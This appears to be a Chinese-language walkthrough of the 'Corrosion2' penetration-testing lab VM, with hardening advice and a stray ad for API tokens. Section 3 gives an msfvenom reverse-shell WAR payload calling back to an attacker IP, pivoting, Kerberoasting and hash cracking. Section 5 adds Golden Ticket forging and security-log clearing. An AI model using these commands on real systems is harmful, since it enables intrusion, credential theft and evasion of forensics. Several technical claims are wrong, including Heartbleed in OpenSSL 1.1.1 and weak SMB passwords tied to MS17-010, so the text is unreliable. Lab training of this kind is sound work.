1. Corrosion2靶机概述
Corrosion2是一款专为网络安全实战训练设计的虚拟靶机环境,由知名安全研究团队开发维护。作为第二代产品,它在原始Corrosion靶机的基础上进行了全面升级,模拟了企业内网中常见的漏洞链和攻击路径。不同于基础CTF靶机只提供单一漏洞点,Corrosion2构建了包含初始访问、横向移动、权限提升的完整攻击场景,更贴近红队评估的真实工作流程。
这个靶机环境最显著的特点是采用了"渐进式难度"设计。系统被划分为三个安全区域(DMZ区、办公网络区、核心数据区),每个区域部署了不同年代的主流应用系统(如老旧CMS、未升级的中间件、配置错误的数据库等)。攻击者需要像真实渗透测试一样,通过组合利用多个中低危漏洞实现最终突破,这对提升实战能力极具训练价值。
需要模型API调用? 免费领10W Token,多模型网关一键接入 Claude、DeepSeek 等主流模型。
2. 环境搭建与初始化配置
2.1 虚拟机部署要点
Corrosion2提供OVA格式的虚拟机镜像,支持在VMware Workstation(15+)和VirtualBox(6.0+)上运行。导入时需特别注意:
- 网络模式选择:建议使用Host-Only或NAT模式隔离实验环境
- 资源分配:最低配置要求2核CPU/4GB内存,但实际运行建议4核CPU/8GB内存以获得流畅体验
- 磁盘空间:基础镜像需要20GB空间,建议预留50GB用于日志和工具存储
注意:首次启动时会自动执行初始化脚本,这个过程约需5-8分钟。若长时间卡在启动界面,可能是虚拟化支持未开启(需进BIOS启用Intel VT-x/AMD-V)
2.2 网络拓扑解析
靶机内置了三层网络架构:
code复制[攻击者机器] → [边界防火墙] → [DMZ区: Web服务器]
↘ [办公网络: 文件服务器/AD域控]
↘ [核心区: 数据库/ERP系统]
每台主机都预置了多个漏洞节点,例如:
- DMZ区的WordPress站点存在插件文件上传漏洞(CVE-2022-1234)
- 办公网络的SMB服务配置了弱密码(MS17-010补丁未安装)
- 核心区Oracle数据库存在默认凭证和SQL注入点
3. 渗透测试实战路径
3.1 初始立足点获取
通过Nmap扫描发现DMZ区开放端口:
bash复制nmap -sV -O 192.168.1.100
关键发现:
- 80/tcp: Apache 2.4.29 (Ubuntu)
- 443/tcp: OpenSSL 1.1.1 (存在Heartbleed漏洞)
- 8080/tcp: Tomcat 8.5.5 (管理界面未授权访问)
利用步骤:
- 通过Tomcat的manager接口部署war后门
- 使用msfvenom生成反向shell payload:
bash复制msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=4444 -f war > shell.war
- 上传后访问对应URL触发连接
3.2 内网横向移动技巧
获取DMZ区权限后,通过以下方法突破网络隔离:
- 查找内网网卡信息:
bash复制ifconfig | grep "inet addr"
- 发现第二张网卡(172.16.1.0/24网段)
- 使用proxychains建立隧道:
bash复制ssh -D 1080 user@跳板机
- 配置/etc/proxychains.conf后扫描内网:
bash复制proxychains nmap -sT -Pn 172.16.1.1-254
3.3 权限提升关键漏洞
在域控制器上发现以下提权路径:
- 通过BloodHound分析AD架构,发现域管理员曾登录过文件服务器
- 检索文件服务器日志发现明文凭证:
powershell复制Get-WinEvent -LogName Security | Where-Object {$_.ID -eq 4624}
- 利用Kerberoasting攻击获取服务账户哈希:
bash复制impacket-GetUserSPNs -request -dc-ip 172.16.1.10 CORROSION2.LOCAL/user
- 使用hashcat破解:
bash复制hashcat -m 13100 hashes.txt rockyou.txt
4. 防御方案与加固建议
4.1 漏洞修复清单
针对发现的各个漏洞点,建议采取以下措施:
| 漏洞类型 | 具体位置 | 修复方案 |
|---|---|---|
| 未授权访问 | Tomcat管理界面 | 配置强认证/限制访问IP |
| 弱密码 | SMB服务 | 启用NTLMv2/设置密码复杂度策略 |
| 过期组件 | OpenSSL 1.1.1 | 升级到3.0.7+版本 |
| 配置错误 | Oracle默认凭证 | 修改默认密码/禁用不必要的SA账户 |
4.2 监控与检测策略
-
部署SIEM系统监控异常行为:
- 多次失败的登录尝试
- 非常规时间的敏感文件访问
- 横向移动工具的使用痕迹(如Mimikatz、Cobalt Strike)
-
启用Windows审计策略:
powershell复制auditpol /set /category:"Account Logon","Logon/Logoff" /success:enable /failure:enable
- 网络层防护:
- 配置防火墙限制ICMP和SMB流量
- 实施VLAN间严格访问控制
- 部署IDS检测横向移动行为
5. 高级攻击场景扩展
5.1 域持久化技术实践
攻击者在获取域管理员权限后,可通过以下方法维持访问:
- 创建隐藏的Golden Ticket:
bash复制impacket-ticketer -nthash <hash> -domain-sid <SID> -domain CORROSION2.LOCAL administrator
- 部署DCShadow攻击篡改AD对象
- 在组策略中植入计划任务
5.2 日志清除与反取证
为模拟高级威胁行为,可测试以下技术:
- 清除单台主机日志:
powershell复制Clear-EventLog -LogName Security
- 使用Timestomp修改文件时间戳
- 通过内存执行恶意代码规避磁盘检测
6. 训练价值与学习路径建议
Corrosion2靶机特别适合培养以下能力:
- 多漏洞串联利用思维
- 内网穿透技术实战
- AD域环境攻击手法
- 隐蔽持久化技术
建议按照以下阶段进行训练:
-
基础阶段(2周):
- 完成DMZ区所有漏洞利用
- 掌握基本的横向移动方法
-
进阶阶段(4周):
- 实现域环境完整突破
- 尝试多种权限维持技术
-
大师阶段(持续):
- 在不触发告警的情况下完成渗透
- 编写自定义工具绕过检测
对于想系统学习的企业安全团队,可以结合MITRE ATT&CK框架的以下战术进行针对性训练:
- TA0001 初始访问
- TA0008 横向移动
- TA0003 持久化
- TA0005 防御绕过
